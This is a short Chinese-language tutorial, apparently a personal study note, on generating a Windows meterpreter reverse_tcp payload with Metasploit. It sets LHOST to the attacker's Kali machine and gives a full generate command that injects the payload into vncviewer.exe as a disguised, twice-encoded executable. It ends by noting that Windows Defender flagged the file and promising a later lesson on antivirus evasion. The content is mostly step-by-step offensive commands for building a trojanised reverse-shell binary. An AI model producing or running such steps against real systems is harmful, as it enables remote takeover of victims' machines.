Metasploit Framework —— Payload

这里也是直接以练习为主,学习如何使用 payload:
!!!
附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode
!!!
这里我起初用的 payload 是 payload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/reverse_tcp,图我就不换了,原理是一样的

就以 windows 反弹 shell 为例:
搜索:search payload/windows/meterpreter/reverse_tcp
Metasploit Framework —— Payload

使用:use payload/windows/meterpreter/reverse_tcp
Metasploit Framework —— Payload

有无需要配置的地方:show options
Metasploit Framework —— Payload

配置:set LHOST 192.168.67.221
[这里的 IP 为 kali IP]
Metasploit Framework —— Payload

生成该 shellcode 的时候我们可以查看一下帮助:
Metasploit Framework —— Payload

其中最常用的有:
!!!

-i:对其进行编码的次数
-f:输出格式[如:exe,py,c,bash,java等]
-x: 指定模板[如:以 putty 为模板]
-k: 保留模板行为并将 payload 作为新线程注入
-o:输出到…

在这里生成一个以 vncviewer.exe 为模板,对其进行两次编码,且作为新线程注入到模板当中,输出格式为 exe 格式,输出到 /root/ 目录下并命名为 vnc.exe
generate -x /usr/share/windows-resources/binaries/vncviewer.exe -i 2 -k -f exe -o /root/vnc.exe
Metasploit Framework —— Payload

把生成的 exe 文件拉到 win10 看看:
Metasploit Framework —— Payload

好的,立马被查杀,关于免杀这块会有专门的讲解,就到先这里啦~

????